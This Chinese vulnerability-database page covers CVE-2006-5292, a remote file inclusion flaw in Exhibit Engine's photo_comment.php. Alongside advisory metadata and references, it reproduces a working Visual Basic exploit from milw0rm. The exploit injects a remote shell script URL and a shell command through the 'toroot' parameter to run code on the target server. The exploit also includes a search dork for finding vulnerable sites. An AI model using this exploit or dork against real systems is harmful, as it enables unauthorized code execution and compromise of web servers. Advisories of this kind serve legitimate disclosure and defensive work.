Exhibit Engine 'Photo_Comment.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111230 漏洞类型 输入验证
发布时间 2006-10-10 更新时间 2006-10-19
CVE编号 CVE-2006-5292 CNNVD-ID CNNVD-200610-221
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2509
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-221
|漏洞详情
ExhibitEngine的photo_comment.php中存在PHP远程文件包含漏洞,远程攻击者可以通过toroot参数中的URL执行任意的PHP代码。
|漏洞EXP
'
' EXPLOIT (c)oded by Kacper in Visual Basic ;-)
'
':::::::::  :::::::::: :::     ::: ::::::::::: :::
':+:    :+: :+:        :+:     :+:     :+:     :+:
'+:+    +:+ +:+        +:+     +:+     +:+     +:+
'+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+
'+#+    +#+ +#+         +#+   +#+      +#+     +#+
'#+#    #+# #+#          #+#+#+#       #+#     #+#
'#########  ##########     ###     ########### ##########
'::::::::::: ::::::::::     :::     ::::    ::::
'    :+:     :+:          :+: :+:   +:+:+: :+:+:+
'    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+
'    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+
'    +#+     +#+        +#+     +#+ +#+       +#+
'    #+#     #+#        #+#     #+# #+#       #+#
'    ###     ########## ###     ### ###       ###
'
'
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'- Exhibit Engine <= 1.5 RC 4 (photo_comment.php) Remote File Include Exploit
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'- [Script name: Exhibit Engine 1.5 RC 4
'- [Script site: http://www.edrotberg.org/gallery/
'- dork: "generated by Exhibit Engine 1.5 RC 4"
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'-          Find by: Kacper (a.k.a Rahim)
'+
'-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
'+
'-          Contact: kacper1964@yahoo.pl
'-                        or
'-           http://www.rahim.webd.pl/
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'- Special Greetz: DragonHeart ;-)
'- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
'-      SkD, nukedclx, Ramzes, t3k, dn0d'e, sysios, SpiderZ
'-
'- Greetz for all users DEVIL TEAM IRC Channel !!
'!@ Przyjazni nie da sie zamienic na marne korzysci @!
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'-            Z Dedykacja dla osoby,
'-         bez ktorej nie mogl bym zyc...
'-           K.C:* J.M (a.k.a Magaja)
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Private Sub Form_Load()

'**********************SETTINGS**************************
' strona = path to script
' evil_script = path to shell
' cma = shell command
'********************************************************

strona = "http://www.strona.pl/"
evil_script = "http://www.strona.pl/shell.txt?"
cmd = "ls -la"

'********************************************************
Call MsgBox("DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam .... or http://www.rahim.webd.pl/", vbCritical, "See You back again :D !!")
vul = "photo_comment.php?toroot="
exploit = strona & vul & evil_script & cmd
PageLocation$ = exploit
ShellX = Shell("explorer.exe " + PageLocation$)
Unload Me
End Sub

'************************eof*****************************
' Pozdr0 dla ludzi dobrej woli :D
'
'DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam

' milw0rm.com [2006-10-10]
|参考资料

来源:XF
名称:exhibit-engine-photo-file-include(29424)
链接:http://xforce.iss.net/xforce/xfdb/29424
来源:BID
名称:20447
链接:http://www.securityfocus.com/bid/20447
来源:MILW0RM
名称:2509
链接:http://www.milw0rm.com/exploits/2509
来源:MILW0RM
名称:2509
链接:http://milw0rm.com/exploits/2509